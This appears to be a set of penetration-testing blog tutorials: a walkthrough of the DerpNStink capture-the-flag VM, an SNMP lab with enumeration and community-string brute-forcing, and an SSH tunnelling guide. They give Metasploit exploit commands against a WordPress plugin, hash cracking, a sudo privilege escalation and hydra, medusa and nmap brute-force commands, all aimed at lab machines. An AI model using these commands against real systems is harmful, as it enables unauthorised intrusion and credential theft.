Hack the DerpNStink VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as DerpNStink. The credit for making this vm machine goes to “Bryan Smith” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at but you will have to find your own)


Use nmap for port enumeration

nmap -p- -A –open

Nmap scan tells us port 21,22 and 80 are open. As port 80 is running http server we open the ip in our browser and run dirb scan.


Dirb scan shows that the server has wordpress, and when we open /weblog/ directory. When we open /weblog/ directory we get redirected to derpnstink.local/weblog/

So we add domain name in hosts file to get access to the site.

We first open the site using the domain to check if something has changed in website, when we take look at the source code of the page we find our first flag.

Now when we open http://derpnstink.local/weblog we find that it a wordpress site.

We use wpscan to enumerate the plugins and themes and users.

wpscan –u –enumerate at –enumerate ap –enumerate u

Wpscan shows us that a plugin is exploitable.

We also find username and password to be admin for both.

We use metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin

msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit

After getting reverse shell we open wp-config.php and find the name of the database and the user required to access the database.

We find the username and password required through mysql.

We also find two directories we cannot access that also hints us the username.

We use the information we find in the wordpress configuration file to login through phpmyadmin.

After logging through phpmyadmin, we find two hashes in wordpress database.

We use john the ripper to crack the hashes and find a password for stinky as wedgie57.

When we login through wordpress using username stinky and password wedgie57, we find 2nd flag.

We now login to the system through user stinky and password wedgie57. Now going through the system we find our 3rd flag. We also find a pcap file.

Enumerating through the system we find a file called derpissues.txt that we hints us to use the pcap file we found earlier.

Going through the files we found a ssh key, but we were unable to login through ssh using this key.

Now we copy the pcap file into the ftp directory, to download the file into our system through ftp.

We connect to the target machine through ftp and download the pcap file into our system.

After download the file into our system we open it in wireshark and find the password for the other user.

Now we login as mrderp and take a look at the sudoers file and find that we can run a file that starts with derpy as root in /home/mrderp/binaries/derpy*

To run our file as root we create a directory called binaries in /home/mrderp/ directory

Now we create a bash script to spawn to bash shell and save it as derpy.sh

After creating the file we give it read write executable permission and run the file. As soon as we run the file we get the root shell. Going through the files in /root/Desktop directory we find a file called flag.txt, when we open it we find our 4th flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

SNMP Lab Setup and Penetration Testing

What is SNMP?

Simple Network Management Protocol (SNMP) is a protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network. It usually run on UDP port 161.

Download Vyos Link: https://downloads.vyos.io/?dir=release/1.1.8

Create New Virtual Machine using the VMware and change the Network Adapter to Bridged as shown in the given screenshot.

After completing the initial setup in the VMware Boot the Newly created Virtual Machine by clicking on the Power on the Virtual Machine.

The Default Login Credentials for Vyos are

Username: vyos

Password: vyos

The Initial Boot of Vyos will be as shown below:

This is a Live Boot of the vyos, so we will install the vyos to use it properly.

We will use the iso image to install vyos. Type the following command:

Command: install image

Enter “Yes” where it asks to continue.

Next it will ask about the partition management.

Enter “Auto” where it asks about Partition.

It will detect the drives in the Virtual System and ask you to select the particular drive in which you want to install vyos.

Enter “sda” where it asks about the location for installation.

Next it will ask about the size for the root partition for the vyos.

You can enter any size from 1000MB to 21474MB. But it is recommended to keep it maximum i.e. 21474MB.

Next it will ask about the name for the image.

By default the name is set to the version number that is 1.1.8. You can either give a personalised name or you can leave it default.

Next it will ask about the location to copy the sda.

It is recommended to keep it default.

After that it will ask for the password to be kept for the administrator account.

By default it is kept vyos. But from security point of view it is recommended to change it to something complex which is difficult to guess or brute force.

Now it will ask for the drive on which you want to setup GRUB Boot-loader? Again leave it default to “sda”.

After that we have completed the vyos setup. Reboot using the command

Command: reboot

After reboot it will ask for login credentials, Enter the credential that you entered during the installation.

Now we will configure the Network Interface. To do that, we will have to enter configuration mode.

Command: configure

After entering into configuration mode set up Network interface

Syntax: set interface ethernet [network interface] address [Static IPv4 Address]

Command: set interface ethernet eth0 address

Now Commit and Save the Configuration

Command: commit

Command: save

After that type “exit” to get out of configuration mode and then reboot the machine using “reboot” command

We are rebooting because the configuration changes come in effect only after a reboot.

You can the view interface which we configured by using the command

Command: show interfaces

Note: Above command will run in configuration mode.

Start SNMP service

Now we will set up the snmp service in the Vyos.

For that we will enter configuration mode using command

Command: configure

Now to set up a snmp service we will need to add a community string and give it an authorization. To do that:

Syntax: set service snmp community [community-string] authorization [auth-mode]

[community-string]: It can be anything but normally it is either public or private. But from a security point of view it is recommended to keep it that cannot be easily guessed or bruteforced.

[auth-mode]: It is the Authorization Mode. We have two options

  1. [ro]: Read Only Authorization (It can only be used to read or extract data, we can change it using this string)
  2. [rw]: Read Write Authorization (It can be used to change the data using the string)

Command: set service snmp community ignite123 authorization ro

Command: set service snmp community ignite123 authorization rw

Now let’s set a user for the system.

Firstly Enter the Configuration Mode.

Command: configure

Now to add a user we will use the following command,

Syntax: set system login user [username] authentication plaintext-password [password]

Command: set system login user ignite authentication plaintext-password ignite123

After this commit the configuration and save it. Also reboot the machine so that changes may take effect.

We have successfully completed snmp Lab in Vyos.

SNMP Enumeration using Kali Linux

Now that we have setup a snmp service let’s pentest it through kali linux inbuilt tools one by one, where We can read and extract information using the community string that have the authorization of reading only but to change the information we will have to use the community string with the read and write authorization.


Let’s check using nmap in Kali Linux Machine which is running on the same network.

nmap –sU –p161, 162

[-sU]: UDP Ports as SNMP service runs on UDP port

[-p]: Specify Port Number; SNMP service runs on port 161 and 162

From given below image you can observed that it has also shown port 161 is open.


snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.

Command: snmpwalk -v1 –c ignite321


[-v1]: Level of verbose mode

[-c]: Community String

From given below image you can observe all details that are specified for “STRING”


We can manipulate these details using the iso id, using another tool snmpset. Here we are renaming the host string from vyos to hacked

Command: snmpset –v1 –c ignite321 iso. Hacked

Let’s check if the changes we implemented had an effect using snmpwalk

Command: snmpwalk –v1 –c ignite321

As you can see that the we have successfully change the host name from vyos to hacked.

We can extract a number of information using snmpwalk

Command: snmpwalk –v1 –c ignite321

Command: snmpwalk –v1 -c ignite321

Command: snmpwalk –v1 –c ignite321

As the data extracted by snmp walk is quite large we can extract that into a text file by using command below

Command: snmpwalk –v1 -c ignite321 > snmpout.txt

We can use gedit to view the extracted information

Command: gedit snmpout.txt 


Like to snmpwalk, snmp-check allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring.

Command: snmp-check -p 161 -c ignite123


[-p]: To specify port

[-c]: To specify Community String


Braa is a mass snmp scanner. The intended usage of such a tool is of course making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.

Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.

Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]

Command: braa [email protected]:.1.3.6.*


We can enumerate SNMP using a Metasploit module called snmp_enum.

use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > set rhosts

msf auxiliary(scanner/snmp/snmp_enum) > set community ignite123

msf auxiliary(scanner/snmp/snmp_enum) > run

We have fetched same result from metasploit as above.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

6 Ways to Hack SNMP Password

In this article, we will learn how to gain control over our victim’s SNMP service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.


Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -P /root/Desktop/pass.txt snmp

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the SNMP password as ignite123.


This is the graphical version to apply dictionary attack via SNMP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select SNMP in box against Protocol option and give the port number 161 against the port option.

Now, go to Passwords tab and in Username section check the box adjacent to Protocol doesn’t require username.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

Now go to the specific Tab and in the SNMP and clear the data written in the text box below the SNMP as shown in the given screenshot.

When you will clear all entries it will look like as shown in next image given below.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the password of your victim.

As you can see that we have the password ignite123 cracked.


Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, SNMP, and VNC to name a few

Run the following command

medusa -M snmp –h –u ignite –P /root/Desktop/pass.txt 


-h: denotes host IP

-u: denote a particular user

But Brute forcing SNMP doesn’t require username but medusa doesn’t work without a proper syntax, you can use any username of your choice

P:  denotes path for password list

As you can observe that we had successfully grabbed the SNMP password as ignite123.


This module will test SNMP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/snmp/snmp_login

msf auxiliary(scanner/snmp/snmp_login)> set rhosts (IP of Remote Host)

msf auxiliary(scanner/snmp/snmp_login)> set pass_file  /root/Desktop/pass.txt

msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true

msf auxiliary(scanner/snmp/snmp_login)> run

 From given below image you can observe that we had successfully grabbed the SNMP password.


We can also crack the snmp password using nmap, execute given below command.

nmap –sU –p 161 –n –script snmp-brute –script-args snmp-brute.communitiesdb=/root/Desktop/pass.txt

As you can see above that we have the password cracked as ignite123.


Onesixtyone is an SNMP scanner that sends multiple SNMP requests to multiple IP addresses, trying different community strings and waiting for replies.

onesixtyone –c /root/Desktop/pass.txt 

As you can see above that we have the password cracked as ignite123 using onesixtyone


Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

Comprehensive Guide to SSH Tunnelling

Basically tunnelling is process which allows data sharing or communication between two different networks privately. Tunnelling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data. 

SSH Tunnel:  Tunneling is the concept to encapsulate the network protocol to another protocol here we put into SSH, so all network communication are encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:     

  1. Dynamic SSH tunneling
  2. Local SSH tunneling
  3. Remote SSH tunneling

Let’s Begin!!

Objective:  To establish SSH connection between remote PC and local system of different network.

Here I have set my own lab which consist three systems in following network:

SSH server (two Ethernet interface) 

IP connected with remote system

IP connected to local network system

SSH client (local network) holds IP

Remote system (outside network)

In following image we are trying to explain SSH tunneling process where a remote PC is trying to connect to which is on INTRANET of another network. To establish connection with SSH client (raj), remote PC will create SSH tunnel which will connect with the local system via SSH server (Ignite).

NOTE: Service SSH must be activated


Given below image is describing the network configuration for SSH server where it is showing two IP and another

Another image given below is describing network configuration for SSH client which is showing IP

Dynamic SSH Tunneling through Windows

Remote Pc is trying to connect to SSH server ( via port 22 and get successful login inside server. Here we had used putty for establishing connection between SSH server (Ubuntu) and remote user (Windows).

Similarly now Remote PC trying to connect with Client PC ( via port 22, since they belongs to different network therefore he receive network error.

Step for Dynamic SSH tunneling

  • Choose option SSH >Tunnel given in the left column of category.
  • Give new port forwarded as 7000 and connection type as dynamic and click on ADD at last.

Now connect to SSH server via port 22 and then click on open when all things get set.

First it will connect to SSH server as you can see we are connected with SSH server (Ignite).

Now login into putty again and give IP of client system as Host Name and Port 22 for SSH then click on open.

Open previous running window of putty choose Proxy option from category and follow given below step:

  • Select proxy type as SOCKS 5
  • Give proxy hostname as and port 7000
  • Click on open to establish connection.

Awesome!! We have successfully access SSH client (raj) via port 7000

Dynamic SSH Tunneling through Kali Linux on Port 80

Now we are employing Kali Linux for SSH tunneling and demonstrating how an attacker or Linux user can take privilege of Tunneling and can established SSH connection with client systems.

 ssh -D 7000 [email protected]

Enter user’s password for login and get access of SSH server as shown below.

Next we need to set network proxy for enabling socksv5 and for that follow below steps.

  • In your web browser “Firefox” go to option for general setting tab and open Network Proxy.
  • Choose No Proxy
  • Enable socksv5

Add localhost, as Manual proxy

So from given below image you can perceive that now we able to connect with client: via port 80.

Dynamic SSH Tunneling through Kali Linux on Port 22

Now connect to client machine through given below command:

ssh -D 7000 [email protected]

Install tsocks through apt repository using command: apt install tsocks.

tsocks – Library for intercepting outgoing network connections and redirecting them through a SOCKS server. 

Open the tsocks.conf file for editing socks server IP and port, in our case we need to mention below two lines and then save it.

Server =

Server_port = 7000

Now connect to SSH client with the help tsocks using given below command.

tscoks ssh [email protected]

Enter the password and enjoy the access of SSH client.

Local SSH Tunneling through Windows

Local tunneling is a process to access a specific SSH client machine for communication. It let you establish the connection on a specific machine which is not connected from internet.

The only difference between dynamic tunnelling and local tunnelling is that, dynamic tunnelling requires socks proxy for tunnelling all TCP traffic and local tunnelling only required destination IP address.

Step for SSH Local tunneling

  • Use putty to connect SSH server ( via port 22 and choose option SSH >Tunnelgiven in the left column of category.

  • Give new port forwarded as7000 and connection type as local 
  • Destination address as for establishing connection with specific client and click on ADD at last.
  • Click on open when all things get set.

First this will establish connection between remote pc and SSH server.

Open new window of putty and follow given below step:

  • Give hostname as localhost and port 7000 and connection type SSH.
  • Click on open to establish connection.

Awesome!! We have successfully access SSH client via port 7000 

Local SSH Tunneling through Kali Linux

Now again we switch into Kali Linux for local tunneling which is quite easy as compare to dynamic. Execute given below command for forwarding port to local machine.

ssh -L 7000: [email protected]  

Now open a new terminal and type below command for connecting to SSH client.

ssh [email protected] -p 7000

Awesome!! We have successfully access SSH client via port 7000 

Remote SSH Tunneling through Putty

Remote tunneling is functional when a client machine wants to access a remote system which is outward from its network.

First need to install putty in our SSH server (ignite) and then follow given steps.

Step for remote tunneling

  • Enter remote system IP
  • Mention port 22
  • Go to SSH>tunnel options

  • Give new port forwarded as7000 and connection type as Remote
  • Destination address as establishing connection with specific client and click on ADD at last.
  • Click on openwhen all things get set.

Now server will get connected to Remote system as shown in below image.

Come back to remote system and enter following command to with SSH client machine.

ssh [email protected] -p 7000

From given below image you can observed that we had successfully connected with SSH client machine via port 7000.

Remote SSH Tunneling through Ubuntu

If you are not willing to use putty for remote tunneling then you can execute following command

ssh -R 7000: [email protected]

Here is our local client (raj) IP and is our remote system IP.

Come back to remote system and enter following command to with SSH client machine.

ssh [email protected] -p 7000

From given below image you can observed that we had successfully connected with SSH client machine via port 7000.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

Related Posts Plugin for WordPress, Blogger...